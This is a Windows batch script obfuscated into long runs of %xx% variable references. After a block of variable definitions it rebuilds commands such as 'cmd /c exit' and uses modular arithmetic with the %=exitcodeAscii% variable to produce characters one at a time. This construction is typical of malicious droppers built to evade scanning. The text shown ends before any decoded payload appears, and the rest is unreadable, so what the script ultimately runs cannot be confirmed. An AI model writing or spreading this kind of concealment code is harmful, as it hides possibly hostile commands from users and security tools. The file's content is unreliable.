%eb%%ax%%cu%%qd%%ta%%xk%%wa%%t%%xc%%gm%%g%%cr%%gm%%ba%%cr%%qg%%qf%%ta%%eb%%ma%%g%%ds%%ta%%ds%%ax%%ul%%xc%%cu%%o%%xk%%h%%wa%%qg%%qf%%h%%hv%%cr%%cu%%u%%cr%%t%%ec%%ba%%ds%%hv%%h%%o%%dc%%hv%%ax%%dc%%wa%%xk%%ma%%rb%%dc%%ds%%nv%%g%%wa%%wa%%ec%%ul%%gm%%ma%%o%%ta%%v%%t%%o%%eb%%g%%pv%%h%%v%%nv%%ds%%qg%%qg%%wa%%cu%%xc%%u%%o%%nv%%cu%%xc%
%eb%%ax%%cu%%qd%%u%%qf%%h%%wa%%v%%nv%%qg%%ba%%u%%t%%u%%ds%%o%%t%%qf%%g%%v%%eb%%ax%%wa%%eb%%rb%%wa%%rb%%t%%ma%%ba%%hv%%eb%%ec%%cu%%cu%%hv%%xc%%qg%%ma%%rb%%cu%%v%%rb%%ta%%pv%%ds%%nv%%ec%%ma%%xk%%hv%%nv%%g%%cu%%dc%%u%%dc%%nv%%u%%wa%%xc%%cr%%qg%%v%%eb%%ds%%ta%%qf%%cu%%qg%%ds%%wa%%qf%%h%%qg%%ta%%eb%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%eb%%wa%%ba%%cr%%nv%%ax%%ma%%cu%%rb%%o%%rb%%hv%%g%%g%%gm%%h%%nv%%eb%%ma%%nv%%ul%%gm%%ma%%xc%%rb%%cr%%xk%%g%%ta%%eb%%ba%%hv%%ds%%qg%%qg%%ba%%ta%%xc%%nv%%o%%t%%ul%%pv%%ax%%gm%%xc%%ma%%cr%%qg%%ax%%gm%%ec%%qf%%cr%%h%%qg%%nv%%xc%
%eb%%ax%%cu%%qd%%o%%cu%%cr%%ec%%wa%%pv%%eb%%wa%%wa%%dc%%t%%hv%%dc%%eb%%h%%t%%ds%%nv%%cr%%hv%%rb%%h%%wa%%qf%%h%%u%%rb%%ta%%gm%%xk%
%xk%%ec%%dc%%ax%%u%%eb%%g%%ax%%xc%%xc%%qd%%oi%%ax%%qd%%ma%%gt%%sg%%rs%%j%%dw%%lf%%j%%lf%%j%%sg%%xk%%j%%dw%%sr%%j%%et%%qg%%sg%%ul%%j%%mk%%gt%%j%%et%%dc%%sg%%yq%%j%%m%%lf%%j%%yq%%j%%sg%%ae%%j%%mk%%hv%%j%%da%%j%%sg%%pi%%j%%mk%%hv%%j%%cm%%gt%%sg%%db%%j%%j%%pv%%pv%
%qu%%qu%%qd%%eb%%ax%%cu%%qd%%ba%%u%%o%%u%%ec%%ax%%qg%%qf%%cu%%hv%%xk%%o%%t%%rb%%eb%%pv%%nv%%ax%%u%%o%%ul%%hv%%u%%v%%g%%gm%%qf%%rb%%ma%%ta%%ma%%ax%%cr%%g%%t%%v%
%qu%%qu%%qd%%eb%%ax%%cu%%qd%%ds%%dc%%u%%ma%%g%%u%%gm%%v%%dc%%gm%%qg%%gm%%ba%%ec%%hv%%cu%%u%%ax%%xk%%ul%%ds%%o%%ax%%nv%%ax%%ds%%g%%wa%%h%%qf%%ds%%gm%%ec%%ul%%eb%%rb%%ds%%qf%%wa%%wa%%t%%rb%%qg%%u%%pv%%rb%%cr%%nv%%cr%%o%
%eb%%ax%%cu%%qd%%u%%qf%%h%%wa%%v%%nv%%qg%%ba%%u%%t%%u%%ds%%o%%t%%qf%%g%%v%%eb%%ax%%wa%%eb%%rb%%wa%%rb%%t%%ma%%ba%%hv%%eb%%ec%%cu%%cu%%hv%%xc%%qg%%ma%%rb%%cu%%v%%rb%%ta%%pv%%ds%%nv%%ec%%ma%%xk%%hv%%nv%%g%%cu%%dc%%u%%dc%%nv%%u%%wa%%xc%%cr%%qg%%v%%eb%%ds%%ta%%qf%%cu%%qg%%ds%%wa%%qf%%h%%qg%%ta%%eb%
%eb%%ax%%cu%%qd%%t%%g%%xk%%ta%%ec%%u%%xc%%h%%u%%wa%%qf%%dc%%ax%%qg%%cr%%ma%%dc%%gm%%eb%%cu%%ma%%v%%hv%%u%%u%%wa%%ds%%gm%%ul%%o%%xc%%g%%hv%%u%%ec%%xk%%eb%%ax%%rb%%o%%u%%cr%%ds%%dc%%dc%%ds%%h%%xk%%cr%%pv%%xk%%xc%%ec%%v%%eb%%o%%ec%%cr%%xk%%h%%v%%h%%hv%%cr%%ma%%h%%v%%eb%%gm%%t%%cr%%qf%%ba%%ul%%cr%%t%%ma%%dc%%qf%%ba%%rb%%hv%%qg%%o%%u%%nv%%nv%%wa%
%eb%%ax%%cu%%qd%%gm%%v%%ma%%cu%%wa%%h%%qf%%u%%v%%hv%%qg%%t%%ta%%cu%%qf%%qg%%gm%%h%%xk%%wa%%wa%%cu%%ds%%t%%v%%ta%%ds%%ta%%pv%%ax%%eb%%qg%%ba%%g%%cu%%cu%%ec%%v%%u%%cu%%t%%ta%%gm%%o%%ax%%eb%%wa%%dc%%qf%%xc%%xc%%v%%nv%%wa%%cu%%ul%%xk%%gm%%t%%wa%%qf%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%wa%%ta%%gm%%g%%g%%o%%ds%%gm%%hv%%xk%%cu%%ax%%nv%%ax%%u%%xk%%xk%%qf%%g%%cr%%cu%%hv%%rb%%t%%g%%g%%xk%%ax%%g%%t%%ta%%qg%%nv%%cr%%xk%%qg%%xc%%ec%%cr%%gm%%ta%%cr%%ds%%ds%%gm%%cr%%qf%%hv%%g%%u%%dc%%dc%%pv%%wa%%nv%%u%%gm%%xc%%gm%%t%%xc%%o%%ul%%o%%xk%%ds%%qf%%gm%%dc%%xk%%t%%xk%%ta%%eb%%h%%wa%%v%%o%%nv%%qg%%qg%%ds%%ma%%gm%%eb%%o%%ma%%gm%%nv%%ta%%xk%%gm%%xc%%rb%%ba%%dc%%xk%%cr%%v%%cr%%u%%ec%%ax%%ul%%t%%ma%%dc%%o%%ds%%u%%gm%
%eb%%ax%%cu%%qd%%o%%cu%%cr%%ec%%wa%%pv%%eb%%wa%%wa%%dc%%t%%hv%%dc%%eb%%h%%t%%ds%%nv%%cr%%hv%%rb%%h%%wa%%qf%%h%%u%%rb%%ta%%gm%%xk%
%qu%%qu%%qd%%eb%%ax%%cu%%qd%%qg%%ba%%cu%%ta%%rb%%wa%%o%%eb%%rb%%ta%%eb%%ds%%v%%h%%t%%ax%%ul%%ec%%u%%ax%%ul%%xk%%ec%%ds%%nv%%ba%%cr%%rb%%ec%%xc%%qf%%xk%%cr%%ul%%t%%o%%pv%%xk%%v%%wa%%h%%qf%%ul%%u%%qg%%v%%xc%%ta%%cu%%ta%%gm%%ul%%ma%%o%%dc%%u%%ba%%ds%%h%%wa%%cu%%gm%%hv%%qf%%cu%%eb%%hv%%xk%%ul%%ta%%ds%%ma%%dc%%cr%%qf%%g%%ba%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%o%%hv%%o%%qf%%h%%g%%hv%%ul%%t%%ul%%ta%%eb%%hv%%rb%%o%%wa%%eb%%qf%%g%%u%%hv%%hv%%eb%%cr%%ma%%t%%ba%%h%%h%%t%%ta%%cu%%ba%%ma%%u%%ma%%t%%xc%%ma%%g%%g%%eb%%hv%%ec%%xc%%qf%%u%%h%%h%%qg%%eb%%hv%%hv%%eb%%wa%%gm%%u%%pv%%qg%%g%%o%%ma%%h%%rb%%gm%%ma%%ma%%cu%%wa%%ax%%u%%t%%xk%%ba%%ba%%cu%%eb%%qg%%g%%ma%%nv%%dc%%rb%%ec%%cu%%ba%%u%%xc%%xk%%xc%%xc%%h%
%qu%%qu%%qd%%eb%%ax%%cu%%qd%%ax%%o%%gm%%ta%%o%%qf%%ba%%ba%%nv%%u%%t%%eb%%ul%%eb%%u%%ba%%ax%%g%%ds%%cu%%u%%o%%ds%%hv%%rb%%v%%eb%%qf%%ta%%qg%%qf%%cu%%ax%%ba%%ba%%xk%%hv%%ba%%o%%hv%%ul%%gm%%cu%%gm%%ma%%ta%%xc%%o%%t%%eb%%eb%%hv%%ma%%xk%%cr%%h%%cr%%t%%qg%%h%%ds%%xk%%pv%%v%%h%%ec%%gm%%g%%rb%%ax%%cr%%ta%%t%%ba%%xk%%ma%%ax%%ma%%ul%%ul%%ec%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%xc%%v%%cu%%cr%%ec%%ax%%ta%%wa%%dc%%ec%%ma%%ax%%nv%%eb%%h%%h%%ds%%xk%%ax%%ul%%ba%%ul%%u%%ma%%cu%%ba%%wa%%g%%xc%%xc%%cu%%nv%%gm%%ec%%rb%%ec%%hv%%g%%ec%%ta%%ul%%h%%cr%%t%%v%%ta%%xc%%wa%%t%%ta%%h%%dc%%ma%%gm%%ba%%ec%%cu%%dc%%wa%%nv%%xc%%gm%%ta%%hv%%ds%%pv%%ta%%xk%%wa%%xc%%wa%%ul%%xk%%h%%dc%%eb%
%eb%%ax%%cu%%qd%%cu%%ul%%g%%cu%%v%%t%%t%%ul%%ma%%dc%%hv%%ax%%xc%%ta%%gm%%eb%%ba%%ba%%eb%%hv%%ax%%qf%%ds%%xk%%wa%%dc%%ba%%cu%%xk%%dc%%g%%xk%%xc%%xc%%gm%%h%%qg%%ta%%dc%%qg%%dc%%qg%%eb%%ax%%ec%%nv%%o%%o%%pv%%dc%%ma%%cr%%ec%%qg%%rb%%cr%%xk%%ax%%eb%%rb%%o%%eb%%ba%%ds%%gm%%ec%%ec%%u%%xc%%qf%%wa%%hv%%xk%%eb%%ds%%gm%%h%%v%%ba%%rb%%wa%%dc%%qg%%qg%%t%%u%%gm%%o%%xc%%nv%%cr%%ds%%eb%%dc%%nv%%cr%%cu%%rb%%t%%xc%%xk%%ma%%ta%%o%%ba%%xc%%gm%%t%%rb%%ta%%ma%
%eb%%ax%%cu%%qd%%ta%%xk%%wa%%t%%xc%%gm%%g%%cr%%gm%%ba%%cr%%qg%%qf%%ta%%eb%%ma%%g%%ds%%ta%%ds%%ax%%ul%%xc%%cu%%o%%xk%%h%%wa%%qg%%qf%%h%%hv%%cr%%cu%%u%%cr%%t%%ec%%ba%%ds%%hv%%h%%o%%dc%%hv%%ax%%dc%%wa%%xk%%ma%%rb%%dc%%ds%%nv%%g%%wa%%wa%%ec%%ul%%gm%%ma%%o%%ta%%v%%t%%o%%eb%%g%%pv%%h%%v%%nv%%ds%%qg%%qg%%wa%%cu%%xc%%u%%o%%nv%%cu%%xc%
%eb%%ax%%cu%%qd%%rb%%cu%%u%%u%%gm%%ec%%ta%%v%%hv%%ec%%ec%%qg%%cu%%nv%%ma%%v%%nv%%ba%%hv%%t%%o%%rb%%ma%%h%%eb%%ba%%nv%%u%%t%%eb%%cu%%ax%%ul%%eb%%hv%%ds%%cu%%gm%%rb%%ax%%gm%%ta%%v%%wa%%t%%ma%%cr%%g%%ta%%eb%%gm%%gm%%ec%%h%%t%%h%%ul%%wa%%hv%%cu%%v%%g%%h%%rb%%ax%%ds%%pv%%t%%nv%%hv%%hv%%ds%%eb%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%o%%cr%%g%%ul%%ba%%eb%%ta%%ax%%hv%%xc%%ax%%wa%%wa%%ta%%v%%xk%%cr%%xc%%qf%%wa%%qg%%dc%%ta%%nv%%cu%%t%%dc%%nv%%cu%%qg%%t%%dc%%h%%ta%%eb%%eb%%t%%xk%%ul%%gm%%ba%%t%%wa%%cu%%ul%%o%%rb%%ta%%v%%t%%u%%rb%%v%%wa%%g%%hv%%qf%%qf%%h%%g%%ds%%t%%pv%%ta%%eb%%t%%xk%%wa%%wa%%xc%%ta%%hv%%ta%%qf%%dc%%ds%%ds%%ul%%hv%%t%%nv%%nv%%ul%%ax%%qf%%wa%%ds%%dc%%cu%%qg%%xk%%ec%%v%%rb%%xc%%ta%%v%%hv%%ds%%ba%%ec%%cr%%qg%%cu%%u%%t%%h%%ul%%wa%%h%%qg%%cu%%xc%%cu%%dc%%ec%
%qu%%qu%%qd%%eb%%ax%%cu%%qd%%v%%ma%%qf%%ds%%ul%%t%%o%%h%%ba%%o%%ul%%qg%%ma%%ba%%ax%%ax%%qg%%ma%%cu%%pv%%xk%%ta%%t%%cu%%g%%ta%%cr%%o%%o%%nv%%cu%%g%%ba%%g%%ba%%ta%%eb%%rb%%dc%%ul%%h%%cr%%ba%%ba%%ta%%u%%wa%%dc%%xk%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%o%%gm%%ul%%ba%%o%%eb%%hv%%cu%%ma%%v%%eb%%xk%%xk%%t%%wa%%ba%%eb%%h%%dc%%xk%%ta%%u%%g%%ma%%g%%o%%dc%%wa%%eb%%dc%%t%%ax%%dc%%cu%%ec%%t%%g%%o%%rb%%ul%%ds%%g%%cr%%ma%%h%%g%%hv%%xc%%hv%%o%%ul%%t%%g%%gm%%qf%%u%%xk%%hv%%qf%%nv%%qg%%ba%%o%%ba%%qg%%qg%%t%%pv%%cu%%g%%cr%%qg%%t%%ec%%ec%%o%%ul%%rb%%ba%%xk%%xc%%wa%%cr%%g%%ta%%nv%%rb%%ba%%ta%%h%%xc%%ec%%wa%%cr%%dc%%qf%%gm%%ec%%nv%%h%%ta%%o%%rb%%rb%%v%%ax%
%eb%%ax%%cu%%qd%%ma%%u%%wa%%ec%%ec%%h%%xc%%gm%%u%%o%%cu%%hv%%rb%%g%%wa%%dc%%ds%%pv%%gm%%cr%%nv%%ta%%xc%%u%%ta%%wa%%hv%%rb%%ul%%ma%%dc%%cu%%dc%%ax%%wa%%cr%%wa%%rb%%wa%%ds%%cu%%hv%%ma%%gm%%nv%%cu%%v%%ec%%rb%%dc%%o%%gm%%cr%%eb%%nv%%wa%%v%%v%%u%
%qu%%qu%%qd%%eb%%ax%%cu%%qd%%dc%%h%%ec%%dc%%ba%%ta%%xc%%ec%%g%%hv%%nv%%g%%xc%%eb%%dc%%nv%%cr%%nv%%ec%%g%%qf%%o%%gm%%cu%%gm%%eb%%u%%nv%%dc%%cr%%wa%%gm%%ul%%qg%%t%%v%%ma%%u%%ba%%hv%%v%%h%%qf%%xc%%eb%%ta%%h%%ec%%ta%%qf%%pv%%qg%%hv%%xk%%xc%%cr%%ds%%h%%h%%v%%qg%%v%%v%%h%%xc%%gm%%h%%o%%ba%%v%%cu%%ta%%ta%%ta%%ta%%xk%%hv%%ax%%ta%%ds%%xc%%h%%ba%%ec%%ec%%u%%ax%%nv%%o%%hv%%t%%ul%%ul%%ax%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%u%%h%%qf%%wa%%qf%%ta%%rb%%xc%%xc%%wa%%v%%u%%rb%%dc%%wa%%xc%%ax%%g%%dc%%gm%%wa%%ma%%wa%%gm%%ta%%ta%%ec%%o%%h%%wa%%ma%%dc%%gm%%wa%%rb%%qg%%o%%v%%ax%%eb%%eb%%ta%%ax%%h%%gm%%h%%ma%%g%%rb%%eb%%t%%ec%%xk%%ta%%ax%%h%%pv%%dc%%wa%%ds%%ma%%nv%%v%%ds%%ds%%v%%t%%ax%%cu%%u%%t%%rb%%o%%ba%%qf%%qf%%cr%%dc%%dc%%g%%ta%%t%%qf%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%eb%%wa%%ba%%cr%%nv%%ax%%ma%%cu%%rb%%o%%rb%%hv%%g%%g%%gm%%h%%nv%%eb%%ma%%nv%%ul%%gm%%ma%%xc%%rb%%cr%%xk%%g%%ta%%eb%%ba%%hv%%ds%%qg%%qg%%ba%%ta%%xc%%nv%%o%%t%%ul%%pv%%ax%%gm%%xc%%ma%%cr%%qg%%ax%%gm%%ec%%qf%%cr%%h%%qg%%nv%%xc%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%h%%hv%%xk%%xk%%cr%%ba%%t%%h%%g%%v%%nv%%t%%hv%%ax%%ec%%qf%%h%%rb%%eb%%dc%%v%%cu%%h%%qg%%hv%%ma%%hv%%ba%%ma%%eb%%v%%u%%t%%hv%%xk%%ta%%u%%ax%%v%%ds%%ds%%ma%%o%%ec%%t%%ec%%h%%g%%ta%%gm%%v%%o%%dc%%u%%h%%g%%ta%%ec%%o%%xc%%ba%%qf%%pv%%eb%%dc%%rb%%cu%%cr%%t%%qg%%ba%%cr%%qg%%ba%%wa%%nv%%hv%%ax%%qf%%gm%%u%%ta%%g%%cr%%rb%%ax%%cu%%ul%%g%%qg%%ax%%ma%%ax%%xc%%xk%%ds%%v%%ds%%ax%%xc%%ul%%qg%%xc%%hv%%rb%%u%%ec%%gm%%ds%%eb%
%eb%%ax%%cu%%qd%%wa%%xc%%ec%%xk%%xc%%o%%ul%%hv%%o%%ds%%xk%%gm%%ul%%rb%%xc%%nv%%ec%%t%%ba%%wa%%xk%%u%%ta%%g%%nv%%v%%u%%t%%t%%qg%%ba%%nv%%ma%%xc%%dc%%o%%qf%%eb%%g%%ma%%v%%t%%rb%%ec%%ba%%qg%%t%%t%%qg%%ds%%cu%%u%%qg%%wa%%ul%%eb%%eb%%eb%%ul%%dc%%g%%wa%%dc%%eb%%ba%%ec%%wa%%pv%%ds%%xc%%dc%%xk%%g%%xk%%h%%h%%gm%%xc%%g%%dc%%wa%%xk%%ma%%h%%hv%%dc%%ec%%dc%%ec%%xc%%dc%%ma%%gm%%ax%%cu%%o%%nv%%ul%%cu%%cr%%v%%xk%%gm%%ax%%ul%%cr%%gm%%xk%%cr%%hv%%nv%%xk%%dc%%t%%eb%%u%%eb%%dc%%ec%%gm%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%hv%%h%%v%%ul%%xc%%gm%%ds%%nv%%ds%%ax%%qf%%rb%%ul%%ds%%cr%%o%%cu%%xc%%wa%%t%%ma%%ec%%gm%%ec%%dc%%hv%%ma%%hv%%dc%%ds%%o%%dc%%cu%%cu%%ma%%xc%%xc%%pv%%qg%%ds%%rb%%hv%%xk%%ds%%gm%%ma%%t%%u%%xc%%rb%%cu%%nv%%ta%%ba%%v%%eb%%wa%%eb%%qg%%dc%%cr%%ba%%ba%%v%%g%%ba%%g%%ax%%rb%%qg%%xk%%ax%%rb%%ta%%h%%ta%%ax%%qg%%cr%%eb%%h%%nv%%gm%%rb%%hv%%g%%qg%%ec%%v%%cr%%ta%%nv%%h%%g%%xc%%u%%qf%%o%%t%%xk%%ds%%u%%xc%%cr%
&cls
@echo off
set x=set
%x% s= 
%x%%s%zz==
%x%%s%p%zz%/
%x%%s%ma%zz%a
%x%%s%gm%zz%c
%x%%s%qf%zz%m
%x%%s%h%zz%d
%x%%s%ax%zz%e
%x%%s%ds%zz%x
%x%%s%rb%zz%i
%x%%s%cu%zz%t
%x%%s%qd%zz% 
%x%%s%%p%%ma%%s%z%zz%8639305 %% 8639208
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%z%
%x%%s%wp%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%ab%zz%3403246 %% 3403148
